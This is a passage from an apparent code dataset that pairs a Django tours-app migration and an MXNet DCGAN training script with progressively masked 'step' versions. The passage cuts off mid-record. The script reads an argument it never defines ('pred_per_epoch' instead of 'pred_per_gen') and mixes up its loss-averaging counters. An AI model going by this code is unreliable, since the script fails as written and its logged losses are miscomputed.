primary_key=True,\n serialize=False, verbose_name='ID')), ('title', models.CharField(\n max_length=50)), ('descreption', models.TextField()), ('tour',\n models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=\n 'tours.Tour'))]), migrations.AddField(model_name='gallery', name=\n 'tour', field=models.ForeignKey(on_delete=django.db.models.deletion\n .CASCADE, to='tours.Tour'))]\n", "step-5": "# Generated by Django 2.1.5 on 2019-01-20 18:11\n\nfrom django.db import migrations, models\nimport django.db.models.deletion\n\n\nclass Migration(migrations.Migration):\n\n initial = True\n\n dependencies = [\n ]\n\n operations = [\n migrations.CreateModel(\n name='Destination',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('name', models.CharField(max_length=50)),\n ('image', models.ImageField(upload_to='img/destinations')),\n ],\n ),\n migrations.CreateModel(\n name='Gallery',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('title', models.CharField(max_length=50)),\n ('image', models.ImageField(upload_to='img/tours')),\n ],\n ),\n migrations.CreateModel(\n name='Tour',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('title', models.CharField(max_length=50, verbose_name='title for admin')),\n ('status', models.BooleanField(default=False)),\n ('price', models.IntegerField()),\n ('stars', models.IntegerField(choices=[(1, 1), (2, 2), (3, 3), (4, 4), (5, 5)])),\n ('feautured', models.BooleanField(default=True)),\n ('destination', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='tours.Destination')),\n ],\n ),\n migrations.CreateModel(\n name='TourDetail',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('title', models.CharField(max_length=50)),\n ('descreption', models.TextField()),\n ('tour', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='tours.Tour')),\n ],\n ),\n migrations.AddField(\n model_name='gallery',\n name='tour',\n field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='tours.Tour'),\n ),\n ]\n", "step-ids": [ 0, 1, 2, 3, 4 ] }
[ 0, 1, 2, 3, 4 ]
# %% import libs import os import argparse import logging as logger import mxnet as mx import tqdm from mxnet import autograd from mxnet import gluon from gluoncv.utils import makedirs import datasets as gan_datasets from utils import vis, get_cpus, TrainingHistory import models mx.random.seed(5) logger.basicConfig(level=logger.INFO, filename='logs/train_loss-dcgan.log') arg = argparse.ArgumentParser(description="training parameters") arg.add_argument('--lr', type=float, default=0.001, help='learning rate') arg.add_argument('--batch', type=int, default=32, help='batch size') arg.add_argument('--epoch', type=int, default=30000, help='training epochs') arg.add_argument('--continue', type=bool, default=True, help='should continue with last checkpoint') arg.add_argument('--save_checkpoint', type=bool, default=True, help='whether save checkpoint') arg.add_argument('--save_per_epoch', type=int, default=250, help='save checkpoint every specific epochs') arg.add_argument('--save_dir', type=str, default='saved/params-dcgan', help='check point save path') arg.add_argument('--cuda', type=bool, default=False, help='whether use gpu, default is True') arg.add_argument('--pred_per_gen', type=int, default=15, help='make a pred every specific epoch') arg.add_argument('--validation', type=bool, default=False, help='whether use validation set, default: False') arg.add_argument('--dataset', type=str, default='rem_face', help='rem, miku, face,rem_face') opt = arg.parse_args() # %% define parameters epoch = opt.epoch epoch_start = 0 batch_size = opt.batch lr = opt.lr should_save_checkpoint = opt.save_checkpoint save_per_epoch = opt.save_per_epoch save_dir = opt.save_dir pred_per_epoch = opt.pred_per_epoch should_use_val = opt.validation dataset = opt.dataset dataset_loader = getattr(gan_datasets, 'load_{}'.format(dataset)) CTX = mx.gpu() if opt.cuda else mx.cpu() logger.info('Will use {}'.format(CTX)) # %% define dataloader logger.info("Prepare data") # noinspection PyTypeChecker tfs_train = gluon.data.vision.transforms.Compose([ gluon.data.vision.transforms.Resize(size=(256, 256), interpolation=2), gluon.data.vision.transforms.RandomFlipLeftRight(), gluon.data.vision.transforms.RandomSaturation(0.005), gluon.data.vision.transforms.ToTensor(), gluon.data.vision.transforms.Normalize(mean=(0.5, 0.5, 0.5), std=(0.5, 0.5, 0.5)) ]) # noinspection PyTypeChecker tfs_val = gluon.data.vision.transforms.Compose([ gluon.data.vision.transforms.Resize(size=(256, 256), interpolation=2), gluon.data.vision.transforms.ToTensor(), gluon.data.vision.transforms.Normalize(mean=(0.5, 0.5, 0.5), std=(0.5, 0.5, 0.5)) ]) train_set, val_set = dataset_loader() train_loader = gluon.data.DataLoader(train_set.transform_first(tfs_train), batch_size=batch_size, shuffle=True, last_batch='rollover', num_workers=get_cpus(), pin_memory=True) if val_set: val_loader = gluon.data.DataLoader(val_set.transform_first(tfs_val), batch_size=batch_size, shuffle=False, last_batch='rollover', num_workers=get_cpus(), pin_memory=True) # %% define models generator = models.make_gen('v4') discriminator = models.make_dis() generator.initialize(init=mx.init.Normal(0.02), ctx=CTX) discriminator.initialize(init=mx.init.Normal(0.02), ctx=CTX) if getattr(opt, 'continue'): import utils makedirs(save_dir) epoch_start = utils.load_model_from_params(generator, discriminator, save_dir) logger.info('Continue training at {}, and rest epochs {}'.format(epoch_start, epoch - epoch_start)) generator.hybridize() discriminator.hybridize() # %% prepare training logger.info("Prepare training") if should_use_val: history_labels = ['gloss', 'gval_loss', 'dloss', 'dval_loss'] else: history_labels = ['gloss', 'dloss'] history = TrainingHistory(labels=history_labels) loss = gluon.loss.SigmoidBinaryCrossEntropyLoss(from_sigmoid=False) trainer_gen = gluon.Trainer(generator.collect_params(), optimizer='adam', optimizer_params={ 'learning_rate': lr, 'beta1': 0.5 }) trainer_dis = gluon.Trainer(discriminator.collect_params(), optimizer='adam', optimizer_params={ 'learning_rate': lr, 'beta1': 0.5 }) true_label = mx.nd.ones((batch_size,), ctx=CTX) fake_label = mx.nd.zeros((batch_size,), ctx=CTX) def make_noises(bs): return mx.nd.random_normal(0, 1, shape=(bs, 512), ctx=CTX, dtype='float32').reshape((bs, 512, 1, 1)) pred_noise = make_noises(1) mx.nd.save('pred_noise', pred_noise) def validation(g, d, val_loader): g_val_loss = 0.0 d_val_loss = 0.0 iter_times = 0 for data, _ in tqdm.tqdm( val_loader, desc="Validating", leave=False, unit='batch', unit_scale=True, mininterval=1, maxinterval=5, dynamic_ncols=True): iter_times += 1 bs = len(data) nosise = make_noises(bs) data = data.as_in_context(CTX) with autograd.predict_mode(): # loss for d out = d(data) err2real = loss(out, true_label) fake_img = g(nosise) out = d(fake_img) err2fake = loss(out, fake_label) err4dis = err2real + err2fake d_val_loss += err4dis.mean().asscalar() # loss for g fake_img = g(nosise) out = d(fake_img) err4gen = loss(out, true_label) g_val_loss += err4gen.mean().asscalar() return g_val_loss / iter_times, d_val_loss / iter_times # %% begin training d_iter_times = 0 g_iter_times = 0 d_update_times = 0 g_update_times = 0 g_train_loss = 0.0 d_train_loss = 0.0 logger.info("Begin training") for ep in tqdm.tqdm(range(epoch_start, epoch + 1), total=epoch, desc="Total Progress", leave=False, initial=epoch_start, unit='epoch', unit_scale=True, mininterval=10, maxinterval=100, dynamic_ncols=True): for data, _ in tqdm.tqdm( train_loader, desc="Epoch {}".format(ep), leave=False, unit='batch', unit_scale=True, mininterval=1, maxinterval=5, dynamic_ncols=True): bs = len(data) nosise = make_noises(bs) data = data.as_in_context(CTX) # begin training discriminator with autograd.record(): d_iter_times += 1 d_update_times += 1 # train with real image out = discriminator(data) err2real = loss(out, true_label) # train with fake image # detach the input, or its gradients will be computed with autograd.predict_mode(): fake_img = generator(nosise) out = discriminator(fake_img.detach()) err2fake = loss(out, fake_label) err4dis = err2real + err2fake err4dis.backward() trainer_dis.step(bs) d_train_loss += err4dis.mean().asscalar() if d_iter_times % 5 == 0: g_iter_times += 1 g_update_times += 1 # begin training generator with autograd.record(): fake_img = generator(nosise) with autograd.predict_mode(): out = discriminator(fake_img) err4gen = loss(out, true_label) err4gen.backward() trainer_gen.step(bs) g_train_loss += err4gen.mean().asscalar() g_train_loss /= d_iter_times d_train_loss /= g_iter_times # use validation set or not if should_use_val: g_val_loss, d_val_loss = validation(generator, discriminator, val_loader) history.update([g_train_loss, g_val_loss, d_train_loss, d_val_loss]) logger.info("Generator[train: {}, val: {}]".format(g_train_loss, g_val_loss)) logger.info("Discriminator[train: {}, val: {}]".format(d_train_loss, d_val_loss)) else: history.update([g_train_loss, d_train_loss]) logger.info("Generator[{}], Discriminator[{}]".format(g_train_loss, d_train_loss)) g_train_loss = 0.0 d_train_loss = 0.0 d_iter_times = 0 g_iter_times = 0 # make a prediction if g_update_times % pred_per_epoch == 0: fake = generator(make_noises(1))[0] unique_fake = generator(pred_noise)[0] pred_path = 'logs/pred-dcgan' pred_unique_path = os.path.join(pred_path, 'unique') makedirs(pred_path) makedirs(pred_unique_path) vis.show_img(fake.transpose((1, 2, 0)), save_path=pred_path) vis.show_img(unique_fake.transpose((1, 2, 0)), save_path=pred_unique_path) # save history plot every epoch history.plot(save_path='logs/histories-dcgan') # save checkpoint if should_save_checkpoint: if ep % save_per_epoch == 0: generator.save_parameters(os.path.join(save_dir, 'generator_{:04d}.params'.format(ep))) discriminator.save_parameters(os.path.join(save_dir, 'discriminator_{:04d}.params'.format(ep))) history.plot(save_path='logs/histories-dcgan') generator.save_parameters(os.path.join(save_dir, 'generator_{:04d}.params'.format(ep)))
normal
{ "blob_id": "c14d76493cd3dacc55c993f588dec555b7a4a13c", "index": 4192, "step-1": "<mask token>\n\n\ndef make_noises(bs):\n return mx.nd.random_normal(0, 1, shape=(bs, 512), ctx=CTX, dtype='float32'\n ).reshape((bs, 512, 1, 1))\n\n\n<mask token>\n", "step-2": "<mask token>\nmx.random.seed(5)\nlogger.basicConfig(level=logger.INFO, filename='logs/train_loss-dcgan.log')\n<mask token>\narg.add_argument('--lr', type=float, default=0.001, help='learning rate')\narg.add_argument('--batch', type=int, default=32, help='batch size')\narg.add_argument('--epoch', type=int, default=30000, help='training epochs')\narg.add_argument('--continue', type=bool, default=True, help=\n 'should continue with last checkpoint')\narg.add_argument('--save_checkpoint', type=bool, default=True, help=\n 'whether save checkpoint')\narg.add_argument('--save_per_epoch', type=int, default=250, help=\n 'save checkpoint every specific epochs')\narg.add_argument('--save_dir', type=str, default='saved/params-dcgan', help\n ='check point save path')\narg.add_argument('--cuda', type=bool, default=False, help=\n 'whether use gpu, default is True')\narg.add_argument('--pred_per_gen', type=int, default=15, help=\n 'make a pred every specific epoch')\narg.add_argument('--validation', type=bool, default=False, help=\n 'whether use validation set, default: False')\narg.add_argument('--dataset', type=str, default='rem_face', help=\n 'rem, miku, face,rem_face')\n<mask token>\nlogger.info('Will use {}'.format(CTX))\nlogger.info('Prepare data')\n<mask token>\nif val_set:\n val_loader = gluon.data.DataLoader(val_set.transform_first(tfs_val),\n batch_size=batch_size, shuffle=False, last_batch='rollover',\n num_workers=get_cpus(), pin_memory=True)\n<mask token>\ngenerator.initialize(init=mx.init.Normal(0.02), ctx=CTX)\ndiscriminator.initialize(init=mx.init.Normal(0.02), ctx=CTX)\nif getattr(opt, 'continue'):\n import utils\n makedirs(save_dir)\n epoch_start = utils.load_model_from_params(generator, discriminator,\n save_dir)\n logger.info('Continue training at {}, and rest epochs {}'.format(\n epoch_start, epoch - epoch_start))\ngenerator.hybridize()\ndiscriminator.hybridize()\nlogger.info('Prepare training')\nif should_use_val:\n history_labels = ['gloss', 'gval_loss', 'dloss', 'dval_loss']\nelse:\n history_labels = ['gloss', 'dloss']\n<mask token>\n\n\ndef make_noises(bs):\n return mx.nd.random_normal(0, 1, shape=(bs, 512), ctx=CTX, dtype='float32'\n ).reshape((bs, 512, 1, 1))\n\n\n<mask token>\nmx.nd.save('pred_noise', pred_noise)\n\n\ndef validation(g, d, val_loader):\n g_val_loss = 0.0\n d_val_loss = 0.0\n iter_times = 0\n for data, _ in tqdm.tqdm(val_loader, desc='Validating', leave=False,\n unit='batch', unit_scale=True, mininterval=1, maxinterval=5,\n dynamic_ncols=True):\n iter_times += 1\n bs = len(data)\n nosise = make_noises(bs)\n data = data.as_in_context(CTX)\n with autograd.predict_mode():\n out = d(data)\n err2real = loss(out, true_label)\n fake_img = g(nosise)\n out = d(fake_img)\n err2fake = loss(out, fake_label)\n err4dis = err2real + err2fake\n d_val_loss += err4dis.mean().asscalar()\n fake_img = g(nosise)\n out = d(fake_img)\n err4gen = loss(out, true_label)\n g_val_loss += err4gen.mean().asscalar()\n return g_val_loss / iter_times, d_val_loss / iter_times\n\n\n<mask token>\nlogger.info('Begin training')\nfor ep in tqdm.tqdm(range(epoch_start, epoch + 1), total=epoch, desc=\n 'Total Progress', leave=False, initial=epoch_start, unit='epoch',\n unit_scale=True, mininterval=10, maxinterval=100, dynamic_ncols=True):\n for data, _ in tqdm.tqdm(train_loader, desc='Epoch {}'.format(ep),\n leave=False, unit='batch', unit_scale=True, mininterval=1,\n maxinterval=5, dynamic_ncols=True):\n bs = len(data)\n nosise = make_noises(bs)\n data = data.as_in_context(CTX)\n with autograd.record():\n d_iter_times += 1\n d_update_times += 1\n out = discriminator(data)\n err2real = loss(out, true_label)\n with autograd.predict_mode():\n fake_img = generator(nosise)\n out = discriminator(fake_img.detach())\n err2fake = loss(out, fake_label)\n err4dis = err2real + err2fake\n err4dis.backward()\n trainer_dis.step(bs)\n d_train_loss += err4dis.mean().asscalar()\n if d_iter_times % 5 == 0:\n g_iter_times += 1\n g_update_times += 1\n with autograd.record():\n fake_img = generator(nosise)\n with autograd.predict_mode():\n out = discriminator(fake_img)\n err4gen = loss(out, true_label)\n err4gen.backward()\n trainer_gen.step(bs)\n g_train_loss += err4gen.mean().asscalar()\n g_train_loss /= d_iter_times\n d_train_loss /= g_iter_times\n if should_use_val:\n g_val_loss, d_val_loss = validation(generator,\n discriminator, val_loader)\n history.update([g_train_loss, g_val_loss, d_train_loss,\n d_val_loss])\n logger.info('Generator[train: {}, val: {}]'.format(\n g_train_loss, g_val_loss))\n logger.info('Discriminator[train: {}, val: {}]'.format(\n d_train_loss, d_val_loss))\n else:\n history.update([g_train_loss, d_train_loss])\n logger.info('Generator[{}], Discriminator[{}]'.format(\n g_train_loss, d_train_loss))\n g_train_loss = 0.0\n d_train_loss = 0.0\n d_iter_times = 0\n g_iter_times = 0\n if g_update_times % pred_per_epoch == 0:\n fake = generator(make_noises(1))[0]\n unique_fake = generator(pred_noise)[0]\n pred_path = 'logs/pred-dcgan'\n pred_unique_path = os.path.join(pred_path, 'unique')\n makedirs(pred_path)\n makedirs(pred_unique_path)\n vis.show_img(fake.transpose((1, 2, 0)), save_path=pred_path)\n vis.show_img(unique_fake.transpose((1, 2, 0)), save_path=\n pred_unique_path)\n history.plot(save_path='logs/histories-dcgan')\n if should_save_checkpoint:\n if ep % save_per_epoch == 0:\n generator.save_parameters(os.path.join(save_dir,\n 'generator_{:04d}.params'.format(ep)))\n discriminator.save_parameters(os.path.join(save_dir,\n 'discriminator_{:04d}.params'.format(ep)))\nhistory.plot(save_path='logs/histories-dcgan')\ngenerator.save_parameters(os.path.join(save_dir, 'generator_{:04d}.params'.\n format(ep)))\n", "step-3": "<mask token>\nmx.random.seed(5)\nlogger.basicConfig(level=logger.INFO, filename='logs/train_loss-dcgan.log')\narg = argparse.ArgumentParser(description='training parameters')\narg.add_argument('--lr', type=float, default=0.001, help='learning rate')\narg.add_argument('--batch', type=int, default=32, help='batch size')\narg.add_argument('--epoch', type=int, default=30000, help='training epochs')\narg.add_argument('--continue', type=bool, default=True, help=\n 'should continue with last checkpoint')\narg.add_argument('--save_checkpoint', type=bool, default=True, help=\n 'whether save checkpoint')\narg.add_argument('--save_per_epoch', type=int, default=250, help=\n 'save checkpoint every specific epochs')\narg.add_argument('--save_dir', type=str, default='saved/params-dcgan', help\n ='check point save path')\narg.add_argument('--cuda', type=bool, default=False, help=\n 'whether use gpu, default is True')\narg.add_argument('--pred_per_gen', type=int, default=15, help=\n 'make a pred every specific epoch')\narg.add_argument('--validation', type=bool, default=False, help=\n 'whether use validation set, default: False')\narg.add_argument('--dataset', type=str, default='rem_face', help=\n 'rem, miku, face,rem_face')\nopt = arg.parse_args()\nepoch = opt.epoch\nepoch_start = 0\nbatch_size = opt.batch\nlr = opt.lr\nshould_save_checkpoint = opt.save_checkpoint\nsave_per_epoch = opt.save_per_epoch\nsave_dir = opt.save_dir\npred_per_epoch = opt.pred_per_epoch\nshould_use_val = opt.validation\ndataset = opt.dataset\ndataset_loader = getattr(gan_datasets, 'load_{}'.format(dataset))\nCTX = mx.gpu() if opt.cuda else mx.cpu()\nlogger.info('Will use {}'.format(CTX))\nlogger.info('Prepare data')\ntfs_train = gluon.data.vision.transforms.Compose([gluon.data.vision.\n transforms.Resize(size=(256, 256), interpolation=2), gluon.data.vision.\n transforms.RandomFlipLeftRight(), gluon.data.vision.transforms.\n RandomSaturation(0.005), gluon.data.vision.transforms.ToTensor(), gluon\n .data.vision.transforms.Normalize(mean=(0.5, 0.5, 0.5), std=(0.5, 0.5, \n 0.5))])\ntfs_val = gluon.data.vision.transforms.Compose([gluon.data.vision.\n transforms.Resize(size=(256, 256), interpolation=2), gluon.data.vision.\n transforms.ToTensor(), gluon.data.vision.transforms.Normalize(mean=(0.5,\n 0.5, 0.5), std=(0.5, 0.5, 0.5))])\ntrain_set, val_set = dataset_loader()\ntrain_loader = gluon.data.DataLoader(train_set.transform_first(tfs_train),\n batch_size=batch_size, shuffle=True, last_batch='rollover', num_workers\n =get_cpus(), pin_memory=True)\nif val_set:\n val_loader = gluon.data.DataLoader(val_set.transform_first(tfs_val),\n batch_size=batch_size, shuffle=False, last_batch='rollover',\n num_workers=get_cpus(), pin_memory=True)\ngenerator = models.make_gen('v4')\ndiscriminator = models.make_dis()\ngenerator.initialize(init=mx.init.Normal(0.02), ctx=CTX)\ndiscriminator.initialize(init=mx.init.Normal(0.02), ctx=CTX)\nif getattr(opt, 'continue'):\n import utils\n makedirs(save_dir)\n epoch_start = utils.load_model_from_params(generator, discriminator,\n save_dir)\n logger.info('Continue training at {}, and rest epochs {}'.format(\n epoch_start, epoch - epoch_start))\ngenerator.hybridize()\ndiscriminator.hybridize()\nlogger.info('Prepare training')\nif should_use_val:\n history_labels = ['gloss', 'gval_loss', 'dloss', 'dval_loss']\nelse:\n history_labels = ['gloss', 'dloss']\nhistory = TrainingHistory(labels=history_labels)\nloss = gluon.loss.SigmoidBinaryCrossEntropyLoss(from_sigmoid=False)\ntrainer_gen = gluon.Trainer(generator.collect_params(), optimizer='adam',\n optimizer_params={'learning_rate': lr, 'beta1': 0.5})\ntrainer_dis = gluon.Trainer(discriminator.collect_params(), optimizer=\n 'adam', optimizer_params={'learning_rate': lr, 'beta1': 0.5})\ntrue_label = mx.nd.ones((batch_size,), ctx=CTX)\nfake_label = mx.nd.zeros((batch_size,), ctx=CTX)\n\n\ndef make_noises(bs):\n return mx.nd.random_normal(0, 1, shape=(bs, 512), ctx=CTX, dtype='float32'\n ).reshape((bs, 512, 1, 1))\n\n\npred_noise = make_noises(1)\nmx.nd.save('pred_noise', pred_noise)\n\n\ndef validation(g, d, val_loader):\n g_val_loss = 0.0\n d_val_loss = 0.0\n iter_times = 0\n for data, _ in tqdm.tqdm(val_loader, desc='Validating', leave=False,\n unit='batch', unit_scale=True, mininterval=1, maxinterval=5,\n dynamic_ncols=True):\n iter_times += 1\n bs = len(data)\n nosise = make_noises(bs)\n data = data.as_in_context(CTX)\n with autograd.predict_mode():\n out = d(data)\n err2real = loss(out, true_label)\n fake_img = g(nosise)\n out = d(fake_img)\n err2fake = loss(out, fake_label)\n err4dis = err2real + err2fake\n d_val_loss += err4dis.mean().asscalar()\n fake_img = g(nosise)\n out = d(fake_img)\n err4gen = loss(out, true_label)\n g_val_loss += err4gen.mean().asscalar()\n return g_val_loss / iter_times, d_val_loss / iter_times\n\n\nd_iter_times = 0\ng_iter_times = 0\nd_update_times = 0\ng_update_times = 0\ng_train_loss = 0.0\nd_train_loss = 0.0\nlogger.info('Begin training')\nfor ep in tqdm.tqdm(range(epoch_start, epoch + 1), total=epoch, desc=\n 'Total Progress', leave=False, initial=epoch_start, unit='epoch',\n unit_scale=True, mininterval=10, maxinterval=100, dynamic_ncols=True):\n for data, _ in tqdm.tqdm(train_loader, desc='Epoch {}'.format(ep),\n leave=False, unit='batch', unit_scale=True, mininterval=1,\n maxinterval=5, dynamic_ncols=True):\n bs = len(data)\n nosise = make_noises(bs)\n data = data.as_in_context(CTX)\n with autograd.record():\n d_iter_times += 1\n d_update_times += 1\n out = discriminator(data)\n err2real = loss(out, true_label)\n with autograd.predict_mode():\n fake_img = generator(nosise)\n out = discriminator(fake_img.detach())\n err2fake = loss(out, fake_label)\n err4dis = err2real + err2fake\n err4dis.backward()\n trainer_dis.step(bs)\n d_train_loss += err4dis.mean().asscalar()\n if d_iter_times % 5 == 0:\n g_iter_times += 1\n g_update_times += 1\n with autograd.record():\n fake_img = generator(nosise)\n with autograd.predict_mode():\n out = discriminator(fake_img)\n err4gen = loss(out, true_label)\n err4gen.backward()\n trainer_gen.step(bs)\n g_train_loss += err4gen.mean().asscalar()\n g_train_loss /= d_iter_times\n d_train_loss /= g_iter_times\n if should_use_val:\n g_val_loss, d_val_loss = validation(generator,\n discriminator, val_loader)\n history.update([g_train_loss, g_val_loss, d_train_loss,\n d_val_loss])\n logger.info('Generator[train: {}, val: {}]'.format(\n g_train_loss, g_val_loss))\n logger.info('Discriminator[train: {}, val: {}]'.format(\n d_train_loss, d_val_loss))\n else:\n history.update([g_train_loss, d_train_loss])\n logger.info('Generator[{}], Discriminator[{}]'.format(\n g_train_loss, d_train_loss))\n g_train_loss = 0.0\n d_train_loss = 0.0\n d_iter_times = 0\n g_iter_times = 0\n if g_update_times % pred_per_epoch == 0:\n fake = generator(make_noises(1))[0]\n unique_fake = generator(pred_noise)[0]\n pred_path = 'logs/pred-dcgan'\n pred_unique_path = os.path.join(pred_path, 'unique')\n makedirs(pred_path)\n makedirs(pred_unique_path)\n vis.show_img(fake.transpose((1, 2, 0)), save_path=pred_path)\n vis.show_img(unique_fake.transpose((1, 2, 0)), save_path=\n pred_unique_path)\n history.plot(save_path='logs/histories-dcgan')\n if should_save_checkpoint:\n if ep % save_per_epoch == 0:\n generator.save_parameters(os.path.join(save_dir,\n 'generator_{:04d}.params'.format(ep)))\n discriminator.save_parameters(os.path.join(save_dir,\n 'discriminator_{:04d}.params'.format(ep)))\nhistory.plot(save_path='logs/histories-dcgan')\ngenerator.save_parameters(os.path.join(save_dir, 'generator_{:04d}.params'.\n format(ep)))\n", "step-4": "import os\nimport argparse\nimport logging as logger\nimport mxnet as mx\nimport tqdm\nfrom mxnet import autograd\nfrom mxnet import gluon\nfrom gluoncv.utils import makedirs\nimport datasets as gan_datasets\nfrom utils import vis, get_cpus, TrainingHistory\nimport models\nmx.random.seed(5)\nlogger.basicConfig(level=logger.INFO, filename='logs/train_loss-dcgan.log')\narg = argparse.ArgumentParser(description='training parameters')\narg.add_argument('--lr', type=float, default=0.001, help='learning rate')\narg.add_argument('--batch', type=int, default=32, help='batch size')\narg.add_argument('--epoch', type=int, default=30000, help='training epochs')\narg.add_argument('--continue', type=bool, default=True, help=\n 'should continue with last checkpoint')\narg.add_argument('--save_checkpoint', type=bool, default=True, help=\n 'whether save checkpoint')\narg.add_argument('--save_per_epoch', type=int, default=250, help=\n 'save checkpoint every specific epochs')\narg.add_argument('--save_dir', type=str, default='saved/params-dcgan', help\n ='check point save path')\narg.add_argument('--cuda', type=bool, default=False, help=\n 'whether use gpu, default is True')\narg.add_argument('--pred_per_gen', type=int, default=15, help=\n 'make a pred every specific epoch')\narg.add_argument('--validation', type=bool, default=False, help=\n 'whether use validation set, default: False')\narg.add_argument('--dataset', type=str, default='rem_face', help=\n 'rem, miku, face,rem_face')\nopt = arg.parse_args()\nepoch = opt.epoch\nepoch_start = 0\nbatch_size = opt.batch\nlr = opt.lr\nshould_save_checkpoint = opt.save_checkpoint\nsave_per_epoch = opt.save_per_epoch\nsave_dir = opt.save_dir\npred_per_epoch = opt.pred_per_epoch\nshould_use_val = opt.validation\ndataset = opt.dataset\ndataset_loader = getattr(gan_datasets, 'load_{}'.format(dataset))\nCTX = mx.gpu() if opt.cuda else mx.cpu()\nlogger.info('Will use {}'.format(CTX))\nlogger.info('Prepare data')\ntfs_train = gluon.data.vision.transforms.Compose([gluon.data.vision.\n transforms.Resize(size=(256, 256), interpolation=2), gluon.data.vision.\n transforms.RandomFlipLeftRight(), gluon.data.vision.transforms.\n RandomSaturation(0.005), gluon.data.vision.transforms.ToTensor(), gluon\n .data.vision.transforms.Normalize(mean=(0.5, 0.5, 0.5), std=(0.5, 0.5, \n 0.5))])\ntfs_val = gluon.data.vision.transforms.Compose([gluon.data.vision.\n transforms.Resize(size=(256, 256), interpolation=2), gluon.data.vision.\n transforms.ToTensor(), gluon.data.vision.transforms.Normalize(mean=(0.5,\n 0.5, 0.5), std=(0.5, 0.5, 0.5))])\ntrain_set, val_set = dataset_loader()\ntrain_loader = gluon.data.DataLoader(train_set.transform_first(tfs_train),\n batch_size=batch_size, shuffle=True, last_batch='rollover', num_workers\n =get_cpus(), pin_memory=True)\nif val_set:\n val_loader = gluon.data.DataLoader(val_set.transform_first(tfs_val),\n batch_size=batch_size, shuffle=False, last_batch='rollover',\n num_workers=get_cpus(), pin_memory=True)\ngenerator = models.make_gen('v4')\ndiscriminator = models.make_dis()\ngenerator.initialize(init=mx.init.Normal(0.02), ctx=CTX)\ndiscriminator.initialize(init=mx.init.Normal(0.02), ctx=CTX)\nif getattr(opt, 'continue'):\n import utils\n makedirs(save_dir)\n epoch_start = utils.load_model_from_params(generator, discriminator,\n save_dir)\n logger.info('Continue training at {}, and rest epochs {}'.format(\n epoch_start, epoch - epoch_start))\ngenerator.hybridize()\ndiscriminator.hybridize()\nlogger.info('Prepare training')\nif should_use_val:\n history_labels = ['gloss', 'gval_loss', 'dloss', 'dval_loss']\nelse:\n history_labels = ['gloss', 'dloss']\nhistory = TrainingHistory(labels=history_labels)\nloss = gluon.loss.SigmoidBinaryCrossEntropyLoss(from_sigmoid=False)\ntrainer_gen = gluon.Trainer(generator.collect_params(), optimizer='adam',\n optimizer_params={'learning_rate': lr, 'beta1': 0.5})\ntrainer_dis = gluon.Trainer(discriminator.collect_params(), optimizer=\n 'adam', optimizer_params={'learning_rate': lr, 'beta1': 0.5})\ntrue_label = mx.nd.ones((batch_size,), ctx=CTX)\nfake_label = mx.nd.zeros((batch_size,), ctx=CTX)\n\n\ndef make_noises(bs):\n return mx.nd.random_normal(0, 1, shape=(bs, 512), ctx=CTX, dtype='float32'\n ).reshape((bs, 512, 1, 1))\n\n\npred_noise = make_noises(1)\nmx.nd.save('pred_noise', pred_noise)\n\n\ndef validation(g, d, val_loader):\n g_val_loss = 0.0\n d_val_loss = 0.0\n iter_times = 0\n for data, _ in tqdm.tqdm(val_loader, desc='Validating', leave=False,\n unit='batch', unit_scale=True, mininterval=1, maxinterval=5,\n dynamic_ncols=True):\n iter_times += 1\n bs = len(data)\n nosise = make_noises(bs)\n data = data.as_in_context(CTX)\n with autograd.predict_mode():\n out = d(data)\n err2real = loss(out, true_label)\n fake_img = g(nosise)\n out = d(fake_img)\n err2fake = loss(out, fake_label)\n err4dis = err2real + err2fake\n d_val_loss += err4dis.mean().asscalar()\n fake_img = g(nosise)\n out = d(fake_img)\n err4gen = loss(out, true_label)\n g_val_loss += err4gen.mean().asscalar()\n return g_val_loss / iter_times, d_val_loss / iter_times\n\n\nd_iter_times = 0\ng_iter_times = 0\nd_update_times = 0\ng_update_times = 0\ng_train_loss = 0.0\nd_train_loss = 0.0\nlogger.info('Begin training')\nfor ep in tqdm.tqdm(range(epoch_start, epoch + 1), total=epoch, desc=\n 'Total Progress', leave=False, initial=epoch_start, unit='epoch',\n unit_scale=True, mininterval=10, maxinterval=100, dynamic_ncols=True):\n for data, _ in tqdm.tqdm(train_loader, desc='Epoch {}'.format(ep),\n leave=False, unit='batch', unit_scale=True, mininterval=1,\n maxinterval=5, dynamic_ncols=True):\n bs = len(data)\n nosise = make_noises(bs)\n data = data.as_in_context(CTX)\n with autograd.record():\n d_iter_times += 1\n d_update_times += 1\n out = discriminator(data)\n err2real = loss(out, true_label)\n with autograd.predict_mode():\n fake_img = generator(nosise)\n out = discriminator(fake_img.detach())\n err2fake = loss(out, fake_label)\n err4dis = err2real + err2fake\n err4dis.backward()\n trainer_dis.step(bs)\n d_train_loss += err4dis.mean().asscalar()\n if d_iter_times % 5 == 0:\n g_iter_times += 1\n g_update_times += 1\n with autograd.record():\n fake_img = generator(nosise)\n with autograd.predict_mode():\n out = discriminator(fake_img)\n err4gen = loss(out, true_label)\n err4gen.backward()\n trainer_gen.step(bs)\n g_train_loss += err4gen.mean().asscalar()\n g_train_loss /= d_iter_times\n d_train_loss /= g_iter_times\n if should_use_val:\n g_val_loss, d_val_loss = validation(generator,\n discriminator, val_loader)\n history.update([g_train_loss, g_val_loss, d_train_loss,\n d_val_loss])\n logger.info('Generator[train: {}, val: {}]'.format(\n g_train_loss, g_val_loss))\n logger.info('Discriminator[train: {}, val: {}]'.format(\n d_train_loss, d_val_loss))\n else:\n history.update([g_train_loss, d_train_loss])\n logger.info('Generator[{}], Discriminator[{}]'.format(\n g_train_loss, d_train_loss))\n g_train_loss = 0.0\n d_train_loss = 0.0\n d_iter_times = 0\n g_iter_times = 0\n if g_update_times % pred_per_epoch == 0:\n fake = generator(make_noises(1))[0]\n unique_fake = generator(pred_noise)[0]\n pred_path = 'logs/pred-dcgan'\n pred_unique_path = os.path.join(pred_path, 'unique')\n makedirs(pred_path)\n makedirs(pred_unique_path)\n vis.show_img(fake.transpose((1, 2, 0)), save_path=pred_path)\n vis.show_img(unique_fake.transpose((1, 2, 0)), save_path=\n 